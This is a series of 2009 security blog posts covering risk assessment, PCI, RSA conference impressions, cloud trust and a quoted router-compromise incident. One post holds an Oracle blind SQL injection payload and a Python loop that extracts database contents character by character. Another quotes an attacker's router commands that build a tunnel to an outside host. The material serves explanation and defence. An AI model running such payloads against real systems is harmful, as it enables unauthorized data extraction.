I agree with Ben Tomhave on this particular subject. He is basically saying that we still don't have a good solution for reliable and repeatable risk assessments. I must say that this is not true for smaller scopes, like a single application or a small network or system. However, when we start talking about a risk assessment for an entire organization, I really don't trust the results.

A lot of people will say that this is not true, as they've already successfully completed several assessments. To those I would ask: do you think that just by handing over your methodology you can ensure that the results would be the same for any other (competent) security professional? Until we can answer that with a resounding "YES", I don't think we've developed a good enough methodology for risk assessments. In short, I want to see a methodology that brings results that can be used to:

  • Compare the risk from different organizations (benchmarking!)
  • Compare the risk for the same organization in different points of time
  • Identify a comfortable level of risk that will be pursued by the implementation of security measures
  • Identify the results of applying security measures (answering the basic question, "was it helpful/worth doing?")
  • Compare the risk from two or more different business processes, components or approaches
  • Protect against "black swans" (this one is extremely hard)
It should also:
  • Include "blind spots" from the organization into the risk calculation
  • Consider the interdependency of different business and technology processes and components (how much risk are your production systems inheriting from your development systems?)
  • Be resilient to the fact that almost all medium/big organizations have very high levels of uncertainty on the different variables usually necessary for a meaningful risk calculation
That's not easy and most of the current methodologies cannot address all these issues. That's the fun part in our job today, we need to find how to do it.

Tuesday, May 19, 2009

Helpdesk, a very good start to shape your mindset

I agree with Andrew Hay here:

Should the Helpdesk be a Mandatory Start for an IT Career?




For anyone who has worked in a "front line" customer facing telephone support role, the answer is almost always an emphatic "YES". I tend to agree with my colleagues for one simple reason - embitterment helps you succeed.

Why do I think IT folks need to have a sprinkle of bitterness to be in this field? The fact is that IT, like roadkill removal, is truly a thankless job. Sure, guidance counselors, parents, and the media will all tell you that "Computers are the way to go" for a good salary, benefits, and career advancement. The problem with that mentality is that it's not the mid-1980's anymore. More and more jobs are being moved to parts of the world where wages are lower and, to be perfectly frank, people are willing to do the crappy jobs that North Americans think are beneath them.

To be clear, I'm not saying that working in IT is the hardest, or worst, job around. IT workers are taken for granted, much like the aforementioned roadkill removal worker. Most people enjoy driving to work on a road free from dead animals. When an animal gets run over and left for dead, the roadkill removal person is dispatched to "dispose" of the remains. When was the last time you sent a "thank you" card to your roadkill removal person? To that end, when was the last time you sent a "thank you" card to a member of your IT department? Show of hands?

Now let's jump back to my original topic with a metaphor: an IT career is like a human body and, in order for your career to live a long and healthy life, you need a nice thick layer of skin to protect you from infection. The "infection" in this metaphor refers to the emotional challenges that every IT professional experiences during their career. In order for IT personnel to adequately cope with the critical thinking required to overcome most IT related challenges, a "thick skin" is a requirement — one that I believe should show up on most job postings.

Working on the front lines of an IT organization lets you experience what it's like to sympathize, and empathize, with those who are having the problems. It lets you develop valuable customer service and communications skills while you work towards making the customer happy. Along the way you'll have numerous bad experiences which will serve as lessons that you can use to make yourself a better person.

No matter what role you hold within an organization, you have customers to answer to. This is something that working the front lines forces you to remember. Good or bad, working in the trenches teaches you valuable life lessons that will only help you grow as an IT professional.







The help desk is the best place to see how those incredibly nice projects fail, cause problems or are twisted to be used for different purposes (bringing different risks with them). Working there for some time will help create that "wait a minute, this will cause issues" mindset that is so valuable for the security professional.

Blind SQL Injection, or passing the elephant through the needle hole

This SANS Diary entry from Bojan Zdrnja is a very good explanation of how an apparently non-exploitable SQL Injection condition can be used to get important information from the database. Just by looking at one of the sample injected SQL statements you can see how complex a SQL Injection attack can be:

event = tr' || (select case when substr(banner, 1, 1) = 'A' then 'u' else 'X' end from (select banner from v$version where banner like '%Oracle%')) || 'e
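The core of the technique is just a guessing loop: send one condition per character, watch which of two page behaviours comes back, and rebuild the value one position at a time. A conceptual sketch of that loop, for use only against a test application of your own (the URL, parameter layout and page marker are made up):

    # Conceptual sketch of boolean-based blind extraction, for your own test app only.
    # BASE, the parameter layout and TRUE_MARKER are hypothetical.
    import string, urllib.parse, urllib.request

    BASE = "http://testapp.local/calendar?event="
    TRUE_MARKER = b"1 event found"   # page content when the injected condition is true

    def condition_is_true(payload: str) -> bool:
        with urllib.request.urlopen(BASE + urllib.parse.quote(payload)) as resp:
            return TRUE_MARKER in resp.read()

    def extract_banner(max_len=30) -> str:
        recovered = ""
        for pos in range(1, max_len + 1):
            for ch in string.ascii_letters + string.digits + " .":
                payload = (f"tr' || (select case when substr(banner,{pos},1) = '{ch}' "
                           f"then 'u' else 'X' end from (select banner from v$version "
                           f"where banner like '%Oracle%')) || 'e")
                if condition_is_true(payload):
                    recovered += ch
                    break
            else:
                break   # no character matched: assume end of string
        return recovered

One request per candidate character per position: slow and noisy, but it works, which is exactly why it should be visible to anyone watching the logs.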

Read the full story here.

Monday, May 11, 2009

Very good PCI resource

Trying to be PCI compliant is a tough task. One of the biggest problems is finding good answers to common questions, as the "PCI specialists" are usually very evasive and will hardly ever give you a definitive answer. So, it's extremely valuable when someone posts a set of common Q&A about the subject like this one from Anton Chuvakin. If you are struggling with PCI, you will find a lot of good information there. Below are some of the most common questions I've seen, with the responses from the "PCI DSS Myths and Misconceptions" webinar:

Q: What about the organization that says "but we use authorize.net, PayPal, Google Checkout (or whoever) to process our card payments for items we sell on the web. We don't ever handle the card data ourselves, so we don't need to worry about PCI...do we?"

A: Indeed, outsourcing credit card data processing is a very good way of reducing the scope of your PCI compliant environment. However, it is not the same as “outsourcing PCI DSS” since it does not completely shield you from PCI DSS requirements. “Scope reduction” is NOT “PCI elimination.” There are still areas where you must make an effort to comply. However, PCI Qualified Security Assessor (QSA) is the authorized source of this information.

Q: Is a QSA the only authorized entity to run a scan or can I as the owner of our business run the scan myself?

A: This is a pure misconception; 100% false. As per PCI DSS requirement 11.2, an approved scanning vendor (PCI ASV vendor) must be used for external (=Internet-visible) scanning. Internal scanning can be performed by yourself or anybody else skilled in using a vulnerability scanner.

Q: Do we need to ensure that our third party fulfillment company is PCI DSS compliant as well (especially if they are taking credit card numbers for our customers)?

A: It is hard to say how the contracts are written in such case, but often the answer is indeed “yes.” Moreover, if they take credit cards they need to be compliant and protect the data regardless of their relationship with you. PCI QSA is the authorized source of this information.

Q: Is a fax with credit card information that arrives to organization’s fax server considered to be a digital copy of this data?

A: A digital fax containing a credit card number is likely in scope for PCI DSS. There is some debate about the “pre-authorization data”, but protecting credit card information applies to all types of information: print, files, databases, fax, email, logs, etc.

Q: For a small merchant that only processes a handful of transactions a month, are there alternatives to some of the expensive technology requirements (e.g. application firewalls, independent web/db servers, etc)?

A: Outsourcing credit card transactions is likely the right answer in such circumstances.


Friday, May 8, 2009

Wireshark and SSL connections

I'm maybe a little (a lot?) late on this, but I was reading this nice description of a packet capture analysis from the SANS forensics blog and just found out that Wireshark can read SSL encrypted connections if you provide the private key! This is really nice and useful. Here is a screenshot (also from the SANS post) of the screen where you can indicate the private key to be used:
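For reference, the knob (in the Wireshark builds of that era) is the SSL protocol preference usually called "RSA keys list", with entries in the form ip,port,protocol,key_file; the same preference can be passed to tshark with -o. The address and path below are made up, and note that this only works when the RSA key actually encrypts the pre-master secret, i.e. not with ephemeral Diffie-Hellman cipher suites:

    # Hypothetical example entry for the SSL "RSA keys list" preference:
    #   192.168.1.10,443,http,/home/user/keys/server.key
    # and, if memory serves, the tshark equivalent:
    #   tshark -r capture.pcap -o "ssl.keys_list:192.168.1.10,443,http,/home/user/keys/server.key"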

Friday, May 1, 2009

Numbers, numbers, numbers

The latest Verizon reports brought a lot of very good numbers to the Information Security space, which is so much in need of reliable data. There is always the risk of people using numbers in the wrong way, falling into the famous "base rate fallacy" class of mistakes. Check Pete Lindstrom's comments on it; they perfectly illustrate how easy it is to draw wrong conclusions from those numbers. For me it's just another reason to believe that risk calculations are not as useful as we believe.

Thursday, April 30, 2009

It's a rant, but it so good

It was written some weeks ago by Stuart King. I love it. Two key points for me:

"Many "experts" preach the importance of working through risk models. It's a load of tosh. No matter which way you try to do it, you'll always come out with the answer you first thought of. You might as well use a crystal ball and read tarot cards"

"A network scan report is given to a newly CISSP qualified security analyst and he's asked to review it as part of a job interview. He spots the obvious highlighted security holes but doesn't question why a web server has non-standard ports open. Are we becoming too reliant on auto-scan reports? Security analysts need to be inquisitive, well practiced in basic technical skills, able to spot anomalies, and not afraid to question things that don't look right. The scan results never tell the full story!"

Where is security heading to?

I was reviewing my notes about RSA to prepare a series of posts about what I saw there during last week. I've had a sense of disappointment since last Friday that was preventing me from writing anything good about it. I started to think about all this and also about some of the things that I see as key for the evolution of information security, and I ended up with some thoughts that should go in a separate post. Another one about the RSA sessions I attended will follow. For now, let's try to solve all security problems :-)

If there is anything that shouldn't be ignored in current security (and IT in general) discussions, it is "the Cloud". A quick walk around the vendor booths at RSA would show that this is the hot subject of the day. Cloud Computing is the explanation for why things that were hot last year were not so strong this time. NAC and DLP were everywhere in 2008 (Anton noticed they disappeared too); now everything is "cloud based" and virtualization. In fact, when you consider the cloud services model you'll see that the priorities have indeed changed. One of the key concerns of security professionals until a few months ago was authentication related issues. Within the cloud, however, it loses some importance. Of course, applications still need to authenticate users, but if you try to authenticate all the IT components that you are interacting with in a cloud model, you are lost. At some point in the near future you'll probably be in a situation where you don't know where your data is being processed and stored (outside your organization - that already happens inside it :-)). So, the hot word today is "Trust", not "Identity".

The cloud model is one of the signs that the Jericho Forum is reaching its goals. Now, more than ever, controls need to be on the endpoint and not on the network. And then, when all the security apparatus is on the endpoint, whom should that endpoint trust? A sad conclusion from this new world is that transitive trust is an illusion. Do you trust the service provider of your service provider? The regulatory maze required to make transitive trust work on the compliance side and the immeasurable complexity required to do that on the technology side have condemned transitive trust in the cloud. We need something different if we really want to have information security commensurate with our risk posture in the cloud. But I'll come back to this later.

Most of the innovation presented during RSA could be seen as evolutionary innovation. There was no disruptive innovation at all. But I wonder if there is room for disruptive innovation in security at all. The abrupt changes (and disruptive innovations) come from other places, new business models and technologies. It is naive to expect that those new ideas will be born with security "built in" (I'm talking about the concepts, not necessarily the products). Under this perspective, security will always be an afterthought and, as it will be following something instead of defining the way, there won't be any sharp turns. Security will always be essentially evolutionary.

Ok, but with those "sharp turns" (Web 2.0, cloud computing) coming from business and technology, what should we expect from security? Let's use the security cliché of People, Process and Technology to get a better view:

  • People and process

Hey guys, time to get your eyes out of the debugger. I mean, there's a lot of great content being produced on the validation/verification side, people confirming those very small chances of exploiting a specific product or technology, in other words all those guys "making the theoretical possible". Don't get me wrong, this kind of research is critical to our field, but it seems that everybody now wants to do it. We need more people who can look at the problems from a different perspective, bringing concepts and ideas from other fields, like psychology (Schneier is doing it), biology (Dan Geer) and economics (Ross Anderson). All these fields have evolved a lot and we can get a lot of new ideas from them to apply to security. We can use them not only to improve technology but mostly to improve our processes, our risk management and assessment methodologies and the way we think about risk and security. How can we still be discussing "compliance x security"? We had Malcolm Gladwell as a keynote last year at RSA presenting the ideas from "Blink" (his book at that time) and I still haven't seen anything created in security using that valuable information about how people think. Just think for a minute about how those instinctive decisions mentioned in Blink affect things like security awareness and incident response. You'll be amazed at how much we can use from that in our job.

There is also an old discussion about the profile of the security professional. This is one of the favourite topics of my friend Andre Fucs. Although I think it's a very important discussion, I'm not really interested in it right now. But as I'm listing things that I believe we should work to improve, and I included "People" as a component, it is important to mention it.


  • Technology

These days I'm seeing a lot of people bashing Bruce Schneier because he said that there's nothing new in Cloud Computing. Even if I partially agree with the criticism, I think there is some truth in that statement too. Yes, there is a lot more flexibility and mobility in the cloud model, but there's nothing new in terms of technology. Almost everything we need to do our jobs has been invented already. We just need to look into our huge toolbox and identify what we need to use under these new conditions.

I find the relation between the cloud and virtualization curious. Virtualization is being pointed to as a way to implement the platform independence and resource democratization that characterize the cloud, but I believe we are just wasting resources by going in that direction. A few years ago Java (or, being more generic, "bytecode" stuff) seemed to be the way to go to achieve that platform independence. So, why put layers upon layers of OSes if we can do what is needed using different OSes? Remember "write once, run everywhere"? Maybe this is not the best time to talk about Java, anyway.

We are also pushing a lot of things to the endpoint. See what is being done with AJAX, all those mashups. And how are we trying to secure the endpoint nightmare? Sandboxes! How will sandboxes work with a technology that requires you to integrate all those things from different sources and trust levels exactly AT the endpoint? I really can't see a successful sandbox implementation under the Web 2.0 reality.

Why am I talking about virtualization and sandboxing? Because both, when we talk about security, are solutions to a problem that we may know how to solve with better approaches. We are doing that because we are using crappy Operating Systems. I don't want to sound like Ranum and say that we need to write everything from scratch again, but let's assume, for instance, that we have decent Operating Systems; why would I bother to create virtual OS instances when I can put all my applications running on top of a single (more effective and secure) one? Why should we worry about VMotion when we can just move applications? The mainframe guys have been running different applications in the same OS instance for years, securing them against each other and effectively managing resources and performance. Let's learn from those guys before all of them are retired sipping margaritas in Florida.

Ok, even if we solve the issue inside the same organization, there's still the issue of dealing with multiple entities in the cloud model. Again, the problem is Trust. As I said before, transitive trust is an illusion, and if we try to rely on it we will see a whole new generation of security issues arise. I honestly don't know how we will solve it, but one of my bets would be on reputation systems.

In fact, the business model of the cloud is not different from lots of things we do in the "real" world. We trust people and companies without knowing all their employees or all the other parties involved in their business processes. We do that based on reputation. A nice thing about it is that we can leverage some of the cloud characteristics to implement huge reputation services. Reputation databases can share, correlate and distribute information just like we do with names on DNS, with small and distributed queries. Let's imagine a new world of possibilities for a moment:

Your dynamic IT provisioning system constantly gets information about processing costs from cloud services providers. It finds the best prices and acceptable SLAs, triggering the process to transparently move your applications to the best providers, keeping you always at the lowest available "IT utility" cost. Eventually, someone may try to include themselves in the "providers pool" to receive your data onto their premises and abuse it. However, your systems will not only check prices and SLAs. They check the reputation of each provider, allowing the data to be transferred only to those that match your risk decisions. Just think about a database with reputation data on several different providers, like Amazon, Google, GoGrid and McColo.v.2 (!). The database will be constantly fed with information about breaches, infected/compromised systems at each of those providers, vulnerability scanning results, abuse complaints, everything mixed by mathematical models that will tell you which one you should trust your data to. That's for the cloud. Reputation can even be used to help end users' systems decide the trust level of each application they run (Panda and other AV companies are going in this direction). The future looks promising.
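A toy sketch of that selection logic (provider names, scores and the threshold are all imaginary), just to show how reputation would gate the cost optimization rather than replace it:

    # Imaginary data: pick the cheapest provider whose reputation clears the bar.
    providers = [
        {"name": "ProviderA", "cost_per_hour": 0.12, "reputation": 0.95},
        {"name": "ProviderB", "cost_per_hour": 0.08, "reputation": 0.60},  # cheapest, but shady
        {"name": "ProviderC", "cost_per_hour": 0.10, "reputation": 0.90},
    ]
    MIN_REPUTATION = 0.85   # your risk decision, expressed as a threshold

    eligible = [p for p in providers if p["reputation"] >= MIN_REPUTATION]
    best = min(eligible, key=lambda p: p["cost_per_hour"])
    print("move workload to:", best["name"])   # ProviderC: cheapest acceptable, not cheapest overall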

A good call from one of the RSA keynotes came from Cisco CEO John Chambers. He talked about collaboration and integration. I was really expecting to see that on the Expo floor, but there wasn't anything really special. I was expecting to see more about IF-MAP, but didn't see anything, even from Juniper. TippingPoint CTO Brian Smith presented their view of how the integration of different products can improve or, in fact, transform the way we build firewall rules: getting tags from different systems (reputation-based systems?) and building the rules based on those tags. That was awesome, one of the few high points of RSA for me. I was planning to do a review of RSA and ended up writing something like "my view of the current and future state of information security". It's probably poorly organized and not well founded, but I intentionally decided to keep it this way. I want it to be "food for thought" material. As usual, comments are welcome. Have fun.

Wednesday, April 22, 2009

RSA so far

So, trying to do a quick review of the first day:

Nothing really special from the keynotes. Funny to see that some people complained about Scott Charney, from Microsoft, doing a "vendor presentation". Actually, I found his presentation better than the others (RSA, Symantec), as he didn't try to hide the fact that he was talking about the roadmap of his products. I really don't like those vendor presentations where the current challenges are framed in exactly the way that makes the vendor's latest product the perfect fit. Charney at least was honest about what he was showing.


The best session, as usual, was the Cryptographers' Panel. I was happy to hear their concerns about "Black Swans". Bruce Schneier also mentioned his studies on security psychology. What I'd like to see now is how these things affect our current risk management methodologies.

After that, I watched some technical presentations, one of them about the new edition of "Hacking Exposed". Nothing really new there.

Stephan Chenette, from Websense, talked about script fragmentation attacks: basically, JavaScript code being transferred in very small chunks through AJAX to evade detection, mostly by web filters. The attack relies on code that pulls those small chunks and reassembles the exploit in order to execute it, which he called the "decoder". I think one of the challenges of this attack is avoiding detection of the decoder itself. Even if code from "non-malicious" libraries is used, I think there's still room for detection based on "decoder behaviour". An interesting part was when he mentioned cross-domain transfers to get the exploit; there are endless possibilities to explore in that direction. The decoder could find (and grab) the exploit pieces through Google searches, and those pieces could be inserted into apparently innocent comments on blogs and social networks. A lot of room to explore here.
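Just to illustrate why the evasion works, here is a toy sketch of my own (not Chenette's code): a signature that matches trivially on the reassembled stream is invisible when each AJAX chunk is inspected in isolation.

import re

SIGNATURE = re.compile(r"document\.write\(unescape\(")  # toy signature, illustrative only

def scan_per_chunk(chunks):
    """Naive filter: inspects each AJAX response body in isolation."""
    return any(SIGNATURE.search(c) for c in chunks)

def scan_reassembled(chunks):
    """Reassembles the chunks the 'decoder' would concatenate, then scans."""
    return SIGNATURE.search("".join(chunks)) is not None

# The payload split into tiny fragments, as in a script fragmentation attack:
fragments = ["document.wr", "ite(une", "scape("]
print(scan_per_chunk(fragments))     # False -- each fragment looks harmless on its own
print(scan_reassembled(fragments))   # True  -- the joined stream matches

Real filters and real decoders are obviously far more sophisticated; the point is only that detection has to happen either on the reassembled content or on the behaviour of the decoder itself.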

After that I went to see some of my favorite security bloggers on the "security groundhog day" panel, hosted by Mike Rothman. Some good discussions about PCI, cloud computing and compliance. It gave me some ideas to write about these subjects; I'll try to do it after the conference. The best quote of the conference so far came from Rich Mogull: "you need to know your own business". Dead right.

After that, Jeremiah Grossman presented the "top 10" attacks. Nice, but I could have just read the paper and used that slot for another presentation.

And day one was over. To be honest, nothing really special so far. Let's see if I can find something nice at the expo booths.



Do no evil?

That's Google's motto; however, there is really some room for thought after watching the presentation from Ira Winkler. The most interesting thing is not only the huge amount of data that Google has, but also their posture towards inquiries and complaints about it. Still, they are usually seen as a "cool" company. As Ira said, what would the public reaction be if those services provided by Google were being offered by the government?

It's funny to see this trend of "cool companies". Google and Apple are the best examples. I think their posture towards security and privacy concerns is deeply rooted in this perception of "coolness". Nobody thinks they are evil, so why bother trying to convince those few paranoid guys who have doubts?

As a side note, the first person I heard of using Google Latitude is the most paranoid guy I know. What are those companies doing to be so trusted?


Tuesday, April 21, 2009

RSA

OK, a bit late, but here I am. I've just found time to write about RSA now, 40 minutes before the first keynote. I'm really curious about what the conference will look like after all the economic rollercoaster we've been through.

It's also my first time as "press". That makes me feel a little more obligated to blog about it, so I'll try to put my impressions about the sessions I attend. Let the show begin!

(And hey, if you are here and want to meet, just drop me a line by email (augusto at -blog-url) or on Twitter (@apbarros).)


Saturday, April 11, 2009

Here it is: that potential vulnerability is now real

Run code on the host from a VM. That is exactly what everybody who takes virtualization security with a grain of salt has been talking about. Today VMware is releasing a patch for a vulnerability that allows it to happen. Scary.

This is a reminder to avoid excessive resource sharing between VMs from different trust levels, like DMZ and internal servers. When you put VMs from different isolated network segments on the same host, you are creating a potential bypass of the whole network segmentation infrastructure.

Additionally, it's interesting to think about the implications of having your VMs running at a cloud service provider, together with VMs from other organizations. As we don't know anything about their security posture, it's better to assume they are owned, for security planning purposes. That means that if the service provider does not patch its host systems in time, your VMs will be owned too. So, what's your cloud service provider's policy on these issues? Time to ask them.
UPDATE:
I've just seen a very nice video showing an exploit for this vulnerability in action. Check it here.

Monday, April 6, 2009

Interesting webinar from IBM

IBM has scheduled an interesting webinar for April 15th. I don't know if it will be entirely "see how nice our product's features are", but as I've recently been blogging about how middleware happens to be a frequent blind spot, it may be something interesting to follow. You can also see some interesting posts from Gunnar Peterson about it.

Details about the webinar:

Middleware Security Holes You Need to Know About: They Increase Risk of Breaches, and Will Make You Non-Compliant with PCI

April 15th, at 12 Noon ET; 9 am PT

With T.Rob Wyatt of IBM

The Heartland Payments breach is another case where hackers were able to compromise the "soft center" inside the corporate network. One of the major security holes that remains unplugged in many organizations is middleware, especially middleware used for application-to-application and application-to-DB communication.

This webinar will feature the expertise of T.Rob Wyatt, an IBM security consultant focusing on IBM WebSphere MQ, which has been implemented by over 15,000 enterprises around the world. T.Rob will talk about some of the security problems he has found working with merchants, payment processors and other enterprises, most of which have been missed by PCI assessments, often because PCI QSAs are not familiar enough with MQ Series and other middleware to evaluate the security of the configuration.

This webinar will be very valuable for merchants, banks, PCI assessors and anyone else who is not sure what middleware vulnerabilities they have and how to make the changes to eliminate them.

SPEAKER: T.Rob Wyatt - Senior Managing Consultant, IBM

Topics to be discussed include:
** What are the major middleware vulnerabilities?
** What organizations still have these vulnerabilities?
** What is required to eliminate these vulnerabilities?
** What should organizations do near term to solve this problem?

Would you mind explaining how your security works?

Sometimes it's funny to see people's faces when you ask that. Sometimes it is about an organization, sometimes about a product. Usually, the answer comes in the form of a bunch of acronyms, standards and nice phrases like "risk management process". The fun starts when there's also stuff like "100% secure", "certified against hackers" and "military grade encryption".

What is surprising to me (and to others too, as I noticed here) is that sometimes the questions themselves are unexpected. Not only generic questions about the security of a service provider or a product, but also questions about their security details. I'm not surprised that the answers are crappy; I'm surprised that they are surprised by the questions! Hey guys, are you asking the right questions of your vendors? I remember working for a card processing company and asking some software providers about the security aspects of their products; they didn't know how to answer. Worse, they would eventually reply "company A, B and C are using it and nobody there asked us about it". What kind of questions are they hearing? Stupid things like "is this software PCI certified?" (!), "is it SOX certified?" (!!!), "is it ISO 27001 certified?" (!!!!!!!!). It's not hard to see why there's so much bullshit about security from vendors; there are people out there buying (and enjoying) it.

Decently secure services and products will only be available when buyers start to (properly) ask for them. If nobody is asking, why would vendors bother?

Too much good content on the blogosphere

I must say that I should be writing ten times more than I actually am these days. The main reason is that the subjects I've been interested in writing about are so great that I don't want to just throw out a simple post about them. I'm trying to give my thoughts on them some room before writing anything down, but I decided to at least point to what has been making me think lately. The three subjects are:

  • The information security profession: I talked about it for a few minutes with my friend Fucs. He posted something about it on his blog and started a discussion on LinkedIn. I have my own thoughts about it and I'll write about them here too.
  • How to improve security as a whole, or how to improve security decision making. I sent a proposal for an RSA presentation on it that was not accepted. Our current risk assessment and management models don't seem right to me, and I have the perception that most security decisions, roadmaps and strategies are simply fairy tales. I was glad to see the latest rants from Marcus Ranum, where he pointed to a lot of those things. I'm not as pessimistic as he is, as I think we can find alternative ways to think about security and to make better decisions about it. A lot of the issues he mentioned are old facts about society and corporate culture; they haunted the Quality and Safety disciplines long before they became a problem in information security. I believe we should look to our past for things like that and try to find out how we managed to reach a balanced state with them. Maybe we haven't, and we just need to figure out how to deal with that too.
  • The last one, again, comes from my conversations with Fucs. This time, some new ideas about botnet Command and Control systems, improving on things we presented in 2007 at Black Hat Europe. Conficker has implemented some of those concepts, and we are seeing how well (or how badly) they worked and what could be done to improve them. I must say we have some great ideas, but I would really like to find something more on the detection and defence side before doing another presentation about it. Let's see where our chats take us in the near future.
Basically, that's what's in my head now. Feel free to drop comments on them if you want :-)


Thursday, April 2, 2009

MQ, one of the blind spots

I recently wrote about security blind spots, those things inside organizations that bring high risks but are usually not seen during risk and vulnerability assessment activities. Gunnar Peterson mentioned on his blog one of the most common blind spots for big organizations: MQ Series. This is related to the mainframe problem I wrote about in my article on blind spots. As Peterson says, "MQ Series was designed for a benign environment not a hostile one. Because the mainframe plays a central role in many companies' culture they continued to connect the way they always had, and the inspectors (auditors, pen testers) didn't really notice because they focus mainly on the front door". That's really interesting. Security assessments usually pass far away from these very important points, because when scope definitions are made they are not considered "high risk" areas. The problem is that nobody has ever gone through a thorough review of those areas to identify the risk; people just decided that "the mainframe is secure", since there's nothing in the news and no mainframe exploits being published for Metasploit. That's not the case. Those vulnerabilities are of the class where you don't need an exploit, just some inside information. Today, with all those massive lay-offs, do you still think that this kind of information won't be available to potential attackers?

Monday, March 30, 2009

Blind spots

I was reading this post from Richard Bejtlich today and I found this quote from the Verizon Security Blog:

"With the exception of new customers who have engaged our Incident Response team specifically in response to a Conficker infection, Verizon Business customers have reported only isolated or anecdotal Conficker infections with little or no broad impact on operations. A very large proportion of systems we have studied, which were infected with Conficker in enterprises, were "unknown or unmanaged" devices. Infected systems were not part of those enterprise's configuration, maintenance, or patch processes. In one study a large proportion of infected machines were simply discarded because a current user of the machines did not exist. This corroborates data from our DBIR which showed that a significant majority of large impact data breaches also involved "unknown, unknown" network, systems, or data."

Last year I wrote an article for the ISSA Journal, "Security Blind Spots". It was exactly about "unknown or unmanaged" stuff in the network. Windows boxes that can be infected by worms like Conficker are an easy example of blind spots.

Last week I was talking to a vendor who offers one of his solutions in an "appliance version". The other option, the software version, runs on a Windows Server. When I asked for more information about the OS on the appliance, I found that what they were calling "an appliance" was nothing more than a regular Windows box. Almost no hardening at all, with the added downside that Microsoft patches would be distributed only with the vendor's quarterly updates. Now, if you are in charge of a patch management process, would you prefer to deal with an additional regular server (one that integrates perfectly into your patch management systems) or with a "black box" that becomes an unpatched Windows machine nobody is aware is there?

This is becoming common for Linux- and Windows-based "appliances". Beware of the "lower support cost" options like that; if you have processes and tools in place to deal with those OSes in your network, they may be more of a problem than a solution.

Intrusion detection - not only network IDS

Sometimes we spend so much time discussing network-based IDS that we end up not looking at other interesting places for intrusion signs. There is a very nice post on the SANS ISC Diary today about an organization that had one of its border routers compromised and detected it through a periodic configuration file check. I'll put the whole post here, as it is very valuable to illustrate not only the need to look for problems in more than one place but also how you can improve your response process by being prepared for those situations:
"ISC reader Nick contacted us to share information about an Internet router at his workplace that got hacked this weekend. There's several nuggets to learn from in this story, so here goes.3/28/2009 8:34:02 Authen OK test3/28/2009 8:34:04 test Default Group where <cr>3/28/2009 8:34:05 test Default Group who <cr>3/28/2009 8:34:13 test Default Group who <cr>3/28/2009 8:34:19 test Default Group show version <cr>3/28/2009 8:34:23 test Default Group who <cr>A successful login of a user "test" is definitely not a welcome sight in the TACACS authentication log of an Internet router. And the commands that follow are a clear indication that something sinister is going on. We know since Cliff Stoll's experience that somebody who needs to constantly look over his shoulder while connected (issuing the "who" command) isn't up to any good.At this time though, Nick's firm didn't know this yet ... And the command log continues3/28/2009 8:38:38 test Default Group show configuration <cr>3/28/2009 8:38:59 test Default Group show interfaces <cr>3/28/2009 8:39:48 test Default Group configure terminal <cr>3/28/2009 8:39:50 test Default Group interface Tunnel 128 <cr>3/28/2009 8:39:57 test Default Group show interfaces <cr>3/28/2009 8:41:48 test Default Group configure terminal <cr>3/28/2009 8:41:49 test Default Group access-list 20 permit 192.168.2.2 <cr>3/28/2009 8:41:50 test Default Group ip nat pool new [removed] netmask 255.255.255.252 <cr>3/28/2009 8:41:51 test Default Group ip nat inside source list 20 pool new overload <cr>3/28/2009 8:41:52 test Default Group ip nat inside source static tcp 192.168.2.2 113 [removed] 113 extendable3/28/2009 8:41:52 test Default Group interface Serial 1/0 <cr>3/28/2009 8:41:53 test Default Group ip nat outside <cr>3/28/2009 8:41:53 test Default Group interface Tunnel 128 <cr>3/28/2009 8:41:53 test Default Group ip nat inside <cr>3/28/2009 8:41:54 test Default Group ip address 192.168.2.1 255.255.255.0 <cr>3/28/2009 8:41:54 test Default Group ip tcp adjust-mss 1400 <cr>3/28/2009 8:41:55 test Default Group tunnel source Serial 1/0 <cr>3/28/2009 8:41:55 test Default Group tunnel destination [removed] <cr>Whoa! The bad guy is not wasting any time. Barely five minutes after connecting, and he has configured a network tunnel back to his home base.3/28/2009 8:47:23 test Default Group configure terminal <cr>3/28/2009 8:47:26 test Default Group line console 0 <cr>3/28/2009 8:47:32 test Default Group password *****3/28/2009 8:47:45 test Default Group who <cr>3/28/2009 8:47:55 test Default Group configure terminal <cr>3/28/2009 8:48:01 test Default Group line vty 0 1052 <cr>3/28/2009 8:48:06 test Default Group password *****3/28/2009 8:49:12 test Default Group no transport input <cr>3/28/2009 8:49:26 test Default Group transport input ssh <cr>As a next step, the bad guy changes the locally configured passwords. This doesn't make much of a difference, since these accounts only are used when the central TACACS database is not reachable. While the hacker shows quite some familiarity with setting up an IP tunnel on a Cisco router, he doesn't seem to fully grasp the significance of the TACACS entries in the configuration: since TACACS includes accounting logs, all his commands get recorded.At 08:52, the bad guy logs off, and Nick's firm is still completely unaware that their perimeter router has just been subverted. 
But not for long: At 09:00, their "RANCID" script kicks in, pulls the current configuration off the router, compares it with the "last known good" configuration, and immediately e-mails the changes to the network admin. Luckily, the admin understands the significance of what he sees right away, and alerts the incident response team. A while later, the "test" user is removed, the config is cleaned up again, and the bad guy is locked out.Nick's own "lessons learned" that he shared with us are:- Disable outside management of Internet routers unless 100% required- Log!! Log!! Log!!- Review logs, review logs, review logs.- Dont use easy usersnames/passwords.- Talk to people, this includes ISP's. Get the word out of wrong doing.- Dont hack back...(we didnt, but people sometimes feel the need to retaliate). This is against the law.- Keep router firmware upgraded.To which we at SANS ISC would like to add our own- What saved the day here is the use of "RANCID", which acted like a trip wire. Something the bad guy clearly didn't expect- Having a privileged user named "test" with a guessable password is of course unwise. But mistakes happen all the time - that's why we security folks all strive to build our defenses in a way that one single mistake isn't enough to sink the ship. Defense in depth works!Thanks to Nick for sharing the logs and information about the attack!"
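By the way, the "tripwire" that saved the day here is simple enough to sketch. Something along these lines would give the same kind of early warning; get_running_config and send_alert are placeholders for whatever your environment uses to pull configs and send notifications.

import difflib
from pathlib import Path

def check_config(device, get_running_config, send_alert,
                 baseline_dir=Path("/var/lib/configs")):
    """Pull the running config, diff it against the last known-good copy, alert on change."""
    current = get_running_config(device).splitlines()
    baseline_file = baseline_dir / f"{device}.cfg"
    baseline = baseline_file.read_text().splitlines() if baseline_file.exists() else []

    diff = list(difflib.unified_diff(baseline, current,
                                     fromfile="last-known-good", tofile="running"))
    if diff:
        send_alert(device, "\n".join(diff))   # let a human decide whether it's hostile

    # Store the current config as the new baseline for the next run
    baseline_file.parent.mkdir(parents=True, exist_ok=True)
    baseline_file.write_text("\n".join(current))

Scheduled hourly, like Nick's setup, that is all it takes to turn "nobody noticed" into "detected within the hour".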

Friday, March 20, 2009

Patching the cloud - Azure failure

Hoff posted some nice comments on Azure's failure regarding patching the infrastructure used by cloud services. An interesting conclusion is that future patching mechanisms will have to be integrated with VMotion-like features, so that when you apply an OS patch to the infrastructure it can deal with it dynamically without disrupting the service. It would be something like this:
